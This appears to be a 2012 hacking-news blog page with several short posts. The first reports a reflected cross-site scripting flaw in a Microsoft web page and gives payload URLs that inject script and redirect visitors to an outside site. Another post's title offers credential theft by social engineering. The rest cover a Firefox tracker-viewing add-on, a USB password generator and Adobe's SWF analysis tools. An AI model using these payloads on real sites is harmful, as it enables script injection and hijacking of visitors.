Wednesday, 7. March 2012
Mozilla Firefox - XSS
Microsoft official website(micrsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page url.

hxxp://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->3Ealert('Simple XSS')

Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")

by
flexxpoint

Permalink

 


Mozilla Firefox new add-on called Collusion
Mozilla Firefox has launched a new add-on called Collusion that enable users to see which advertisers are tracking their movements on the web.
Collusion is an experimental add-on for Firefox and allows you to see all the third parties that are tracking your movements across the Web. It will show, in real time, how that data creates a spider-web of interaction between companies and other trackers.

Permalink

 


HOW TO FETCH USERNAME AND PASSWORD BY SOCIAL ENGINEERING TECHNOLOGIES


by
ahaseckaser

Permalink

 


DIY USB password generator
Joonas Pihlajamaa a programmer who solved this issue by using a USB HID stick that types a password stored in EEPROM, The device may also generate a new password with 10 characters by only typing the CAPS button which will help in getting a new password in a fast way without need to remember it. The programmer used an old 512 MB flash drive.



Download Source
http://codeandlife.com/data/usb_passgen.zip

Permalink

 


Adobe SWF Investigator
Adobe® SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools, which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file from viewing the individual bits all the way through to dynamically interacting with a running SWF.

Download
http://labs.adobe.com/technologies/swfinvestigator/

Permalink